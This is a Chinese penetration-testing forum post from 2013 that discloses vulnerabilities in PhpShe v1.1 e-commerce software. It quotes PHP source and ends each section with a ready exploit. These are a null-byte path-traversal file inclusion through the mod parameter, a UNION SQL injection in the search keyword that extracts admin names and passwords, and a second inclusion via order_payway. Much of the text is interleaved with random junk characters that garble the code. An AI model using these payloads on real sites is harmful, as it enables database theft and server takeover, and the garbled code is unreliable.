中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]
作者: admin    时间: 2013-4-19 19:01
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
: a5 r; E+ g! K: r* g) D/* Phpshe v1.1 Vulnerability
3 z9 w% [, `5 f% b( L/* ========================/ W# _% Z' }& a
/* By: : Kn1f31 K- H" c0 T3 C/ L9 v7 S; s
/* E-Mail : 681796@qq.com
* Y2 H. O, P  u1 Q2 Y& ^" [/*******************************************************/4 ?: |! f+ J% |% S6 P
0×00 整体大概参数传输
$ I4 n) z; M4 [, U% ~* o5 T
: G6 F1 z2 _/ y) T" b! D
1 U! g8 U3 g# Y4 e8 Y. G+ ]$ N  H& M  X( G' p+ t3 F
//common.php
5 H/ g# _: V, J/ T4 N" b+ D. vif (get_magic_quotes_gpc()) {: D3 M+ w( g, q& F4 z& |
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');) j% \; w3 Q# N) m
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
8 r% Z: t+ W2 e" I: N4 N8 }& _}
: ]% h9 x' y7 Z) ]" xelse {- D4 y2 Z2 F! M# r
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
" W3 u/ S4 S7 o' \* v( F6 a!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');: U$ F  @- B) e" v2 n- X. B4 P
}  Q( `$ b/ z! }7 n1 F! Z: h
session_start();& M, E1 h- ]1 O. K" s6 v# p
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
  ?1 t1 w% _( J!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');/ J8 k; X) h# _) T- n" G/ V) y

& r6 I. t2 j9 E2 A6 T( f0×01 包含漏洞- H. W+ I5 _- }3 `" M* }
, [: H$ Y5 c) Y

7 i* ~7 K" l) p, e( `//首页文件
0 I7 v, w$ h/ G/ ]  a, W<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);$ U1 F: s: R8 }: B
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞, G+ {% Y- H- l; f
pe_result();
. H$ J, ^. a+ {3 H" S, D7 ], g' S?>4 x  J: j( I$ I7 p2 q
//common 文件 第15行开始. j9 u1 F- }! R
url路由配置
  ^+ B/ S" R" f" @/ a$module = $mod = $act = 'index';; z! e" \3 h7 d/ w9 E: D
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
, E, H' v! X" x4 L& e7 x$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);* v. i) O  i# v  r3 e
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);- F$ p2 L3 [9 f
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%006 P1 z: D" B( Q/ b6 x


+ V+ c; s3 Z  ~1 @9 a1 [  a. q2 ` ' `- U  E4 s6 _9 X! U! z" X8 n
0×02 搜索注入
' H1 D) m) Z7 X* |  ?5 [! F$ N
  G% \1 j: [' _# x1 @<code id="code2">

//product.php文件" j! x9 n. f( x3 ?
case 'list':
! U5 h5 Q: W" w7 ]9 w9 x$category_id = intval($id);
2 V: P7 N/ E  E7 i  O# @5 ~$info = $db->pe_select('category', array('category_id'=>$category_id));
/ U/ k- z1 K: o- t* S7 v% L//搜索0 k) i9 q; y- l' G% l- h
$sqlwhere = " and `product_state` = 1";* u' W. v& ^7 A- ?* G, ]0 V, i
pe_lead('hook/category.hook.php');
( w6 T, x* D- B; c- _if ($category_id) {( |% T$ j  o. S4 t. Y5 T
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
" y( ~) n7 E% a/ \/ \" U}
, a/ v0 r+ |5 t$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤8 x' E3 _/ Z+ ~1 y
if ($_g_orderby) {
( g' Q2 I' u) B$ J2 i/ k) d$orderby = explode('_', $_g_orderby);- o3 S6 [5 Y( N
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
- g; u) G  d4 W}
) @: R" Q8 y# P1 p! T$ \else {
. z* ^) ^8 {* P1 W$sqlwhere .= " order by `product_id` desc";" N/ g& m+ W$ r
}
: ~) o) k2 j' n1 v+ I5 O$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
4 \4 h$ N! |+ D//热卖排行
( u6 B& _! x9 _; P1 s1 ~4 g% O$product_hotlist = product_hotlist();
( E, @+ l& q( r$ d//当前路径
6 W! [; V0 {4 y6 K+ u$nowpath = category_path($category_id);
0 Z, b5 {4 D- n* j6 ^* B$seo = pe_seo($info['category_name']);
1 v. R" O& p7 G: B' d" V: rinclude(pe_tpl('product_list.html'));5 z0 ?9 T' n$ z( G6 m0 |
//跟进selectall函数库8 _7 r+ m; q0 S/ c) R2 e4 W2 z. @
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
4 p6 Q. ]9 n) V/ m4 V; L{& Q- D6 o6 @: {  n
//处理条件语句
$ {0 a+ b2 g: k$sqlwhere = $this->_dowhere($where);
' f5 n0 X3 ?) C1 d; r% Preturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
( \# b9 |) {; F& C! }' c* v}6 I; K# o/ n8 t1 ?0 J* ]
//exp
3 w3 p( ?4 l$ z- R& N0 ^product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
# J6 ~4 S, C1 [9 m0 P- f: a

</code>/ U. p6 l& I& A6 E: ^9 A

$ t' N0 Y7 h( G0 K6 e0×03 包含漏洞2
, i; G4 G* T, T# O7 w* I1 Z+ j
% B4 {& ]2 G0 J& p- E<code id="code3">

//order.php

case 'pay':

/ }- o- G5 l1 e: l4 D
$order_id = pe_dbhold($_g_id);

. P6 k! q, d. a+ p" ~
$cache_payway = cache::get('payway');


" d' [: Q7 _/ v5 Rforeach($cache_payway as $k => $v) {

( b8 F6 q  v! ?6 H" E$ v
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

2 V# [/ }: X7 y( V( H
if ($k == 'bank') {


( z3 W* s: h8 E* T3 e$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

0 |/ u, j. s7 O) f: u2 k3 j
}

: U( X' @* Z) m5 o1 m
}

9 r1 n/ V! t6 _+ P- i3 L; m0 e
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

, g/ l: h' M& y+ Z2 A0 T
!$order['order_id'] && pe_error('订单号错误...');


  P8 ^* L1 U7 V9 T* \6 f& @' Xif (isset($_p_pesubmit)) {


: G; j6 h  ?/ l% n8 lif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


/ X& j$ o9 a" q$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

  ~8 J! h5 Q0 c5 P- v
foreach ($info_list as $v) {


( v& v3 Z$ |) o4 \7 S$order['order_name'] .= "{$v['product_name']};";
4 e# s; i: {9 a5 m$ A5 q" q; ]; e


: V5 F: ]4 Q6 c8 \5 p}


1 N2 K. W6 Q, F; Eecho '正在为您连接支付网站,请稍后...';


" G/ n6 j( N* y4 c" Yinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

. ?5 a6 c0 ^/ W7 O9 ^
}//当一切准备好的时候就可以进行"鸡肋包含了"


9 k' T; e5 }/ c" `else {

/ {- p5 f, C; }+ g
pe_error('支付错误...');

) G; C& w9 x9 a. S* V! O
}

; V4 j! `: ^2 u% d  G0 @
}


5 E7 _: h& V7 Y# T: Q! t+ B3 p$seo = pe_seo('选择支付方式');

& N7 \6 C, i. d+ p" z
include(pe_tpl('order_pay.html'));


% {6 m9 ~3 _4 s; F6 h, j9 _break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
) e* _0 n2 o: e& B5 i- I



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2